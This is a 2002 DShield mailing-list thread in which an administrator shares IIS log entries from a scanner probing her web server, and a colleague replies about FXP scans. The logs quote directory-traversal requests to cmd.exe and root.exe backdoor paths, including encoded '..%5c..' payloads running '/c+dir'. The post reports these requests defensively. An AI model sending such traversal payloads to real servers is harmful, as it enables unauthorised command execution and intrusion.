[Dshield] Web server attempt

Gasper, Rick rjgasper at kings.edu
Tue Jul 2 16:38:34 GMT 2002


There has been an increase of FXP type of scans. IIS seems to be vulnerable. Are you running IIS?

Basically they set up a FTP server to FTP server file transfer. Make sure you don't see a successful log entry result of 200 (I think) that would mean your server has been compromised.

Rick Gasper
Manager of Network Services
King's College 
Wilkes-Barre PA 18711
Phone: 570-208-5845
Fax: 570-208-5989
rjgasper at kings.edu


-----Original Message-----
From: Sue Young [mailto:smy at gcmlp.com] 
Sent: Tuesday, July 02, 2002 10:43 AM
To: 'list at dshield.org'
Subject: [Dshield] Web server attempt

This is the first time I've ever gotten hit from El Salvador -  This guy is
still hitting my web server today.  This is just a sample:

2002-07-01 22:39:02 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe
/c+dir 404 -
2002-07-01 22:39:11 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe
/c+dir 404 -
2002-07-01 22:39:13 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:15 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:18 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:23 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-07-01 22:39:25 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:30 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á
../..Á
../..Á
../winnt/system32/cmd.exe
/c+dir 500 -
2002-07-01 22:39:35 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:37 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:39 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:44 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:47 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:49 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:54 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:56 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 23:11:16 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe
/c+dir 404 -
2002-07-01 23:11:22 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe
/c+dir 404 -
2002-07-01 23:11:27 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 23:11:30 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 23:11:36 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 23:11:41 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-07-01 23:11:43 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 

Telefonica El Salvador (NETBLK-UU-63-81-36)
   65 Avenida Norte # 163
   Colonia Escalon, San Salvador SLV 
   SV

   Netname: UU-63-81-36
   Netblock: 63.81.36.0 - 63.81.39.255
   Maintainer: TDES

   Coordinator:
      IP TELCA, NOC Red  (SD176-ARIN)  noc.redip at telefonica.com.sv
      503-275-8550 (FAX) 503-275-6530


Sue Young
Grosvenor Capital Management

_______________________________________________
Dshield mailing list
Dshield at dshield.org
To change your subscription options (or unsubscribe), see: http://www.dshield.org/mailman/listinfo/list




More information about the list mailing list